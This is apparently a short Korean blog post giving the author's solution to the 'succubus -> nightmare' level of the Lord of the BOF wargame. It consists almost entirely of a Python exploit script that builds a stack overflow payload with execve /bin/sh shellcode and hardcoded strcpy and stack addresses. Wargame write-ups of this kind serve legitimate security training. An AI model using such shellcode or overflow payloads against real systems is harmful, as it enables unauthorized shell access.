[Remind] LOB succubus -> nightmare

Wargame/Lord Of the Bof(redhat) 2019. 4. 22. 23:42
exploit.py

import os
from struct import *

p = lambda x : pack("<L" , x)
path = '/home/succubus/nightmare'
strcpyAddress = p(0x8048410)
shellAddress = p(0xbffffa74)
shellCode = shellAddress+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\x90"*11
dstAddress = p(0xbffffaa0)
srcAddress = p(0xbffffa70)
payload = shellCode+"A"*4+strcpyAddress+"A"*4+dstAddress+srcAddress

os.execl(path,path,payload)


'Wargame > Lord Of the Bof(redhat)' 카테고리의 다른 글

[Remind] LOB nightmare -> xavius  (0) 2019.04.23
[Remind] LOB zombie_assassin-> succubus  (0) 2019.04.19
[Remind] LOB assassin -> zombie_assassin  (0) 2019.04.19
[Remind] LOB giant-> assassin  (0) 2019.04.18
[Remind] LOB bugbear -> giant  (0) 2019.04.18
블로그 이미지

JeonYoungSin

메모 기록용 공간

,

공지사항

글 보관함

달력

«   2024/05   »
1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 29 30 31

티스토리툴바